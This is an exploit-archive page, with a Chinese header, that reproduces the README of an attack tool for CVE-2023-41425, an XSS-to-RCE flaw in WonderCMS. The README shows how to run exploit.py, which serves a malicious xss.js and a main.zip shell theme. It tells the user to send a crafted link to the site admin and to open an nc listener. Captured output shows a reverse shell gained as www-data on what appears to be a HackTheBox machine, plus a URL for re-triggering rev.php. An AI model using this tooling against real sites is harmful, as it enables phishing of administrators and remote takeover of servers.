POC详情: b714049a7d6c5f8432c515062fb8a6448e6b775b

标题: WonderCMS 安全漏洞 (CVE-2023-41425)
描述:WonderCMS是一套基于PHP的开源内容管理系统(CMS)。 WonderCMS v.3.2.0版本至v.3.4.2版本存在安全漏洞。攻击者利用该漏洞通过上传到installModule组件的特制脚本执行任意代码。
CVE-2023-41425 (Wonder CMS XSS to RCE) exploit which serves required scripts locally. Good if you're lost at sea and have found a problem with your bike.
# CVE-2023-41425

## Description
A Cross Site Scripting vulnerability in Wonder CMS Version 3.2.0 to Version 3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.
This is a modifed version of the original exploit by [prodigiousMind](https://github.com/prodigiousMind/) which extends to exploit to serve the entire exploit locally, with no reliance on an external internet connection. 

It's useful if you're all at sea, an found a problem with your bike...

Note: xss.js left in the repo for demonstration purposes, the script will overwrite this with your configuration when run. 

## Usage

usage: exploit.py [-h] -u URL -lh LHOST -lp LPORT -sh SRVHOST -sp SRVPORT

WonderCMS 4.3.2 XSS to RCE Exploit

  -h, --help            show this help message and exit
  -u URL, --url URL     The login URL of the WonderCMS site (e.g., http://localhost/wondercms/loginURL)
  -lh LHOST, --lhost LHOST
                        The IP address for the reverse shell listener
  -lp LPORT, --lport LPORT
                        The port for the reverse shell listener
  -sh SRVHOST, --srvhost SRVHOST
                        The local IP serving the malicious XSS JavaScript
  -sp SRVPORT, --srvport SRVPORT
                        The local port serving the malicious XSS JavaScript

## Example

Note: This exploit can be quite slow to work! 

$python3 exploit.py -u http://sea.htb/loginURL  -lh -lp  7777  -sh -sp 8888
# Wondercms 4.3.2 XSS to RCE     #
# Original POC by prodigiousMind #
# Updated version by Ducksec     #

Check you got this stuff right!

Parsed arguments:
URL: http://sea.htb/loginURL
LPORT: 7777

[+] xss.js is created
[+] Execute the below command in another terminal:

nc -lvp 7777

Send the below link to admin:


[+] Ensure that main.zip is still in this directory.
[+] Once the target successfully requests main.zip it's safe to kill this script.

[+] Once complete, you can also re-exploit by requesting: http://sea.htb/themes/revshell-main/rev.php?lhost=

Starting HTTP server to allow access to xss.js
Serving HTTP on port 8888 ( ... - - [02/Oct/2024 14:39:51] "GET /xss.js HTTP/1.1" 200 - - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 - - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 - - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 - - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -

$nc -nvlp 7777
listening on [any] 7777 ...
connect to [] from (UNKNOWN) [] 39958
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 13:40:01 up 4 min,  0 users,  load average: 0.93, 0.49, 0.20
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami

## References
1. https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413
2. https://github.com/WonderCMS/wondercms/releases/tag/3.4.3

## Disclaimer
This code is provided for educational and ethical security testing purposes only. It should be used responsibly and only in environments where explicit authorization has been granted. Unauthorized or malicious use is strictly prohibited. By using this code, you agree to adhere to all applicable laws, regulations, and ethical standards applicable in your jurisdiction. The creators and contributors disclaim any liability for any damages or consequences arising from the misuse or unauthorized use of this code.

[4.0K] /data/pocs/b714049a7d6c5f8432c515062fb8a6448e6b775b ├── [4.3K] exploit.py ├── [2.6K] main.zip ├── [4.0K] README.md └── [1.3K] xss.js 0 directories, 4 files
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。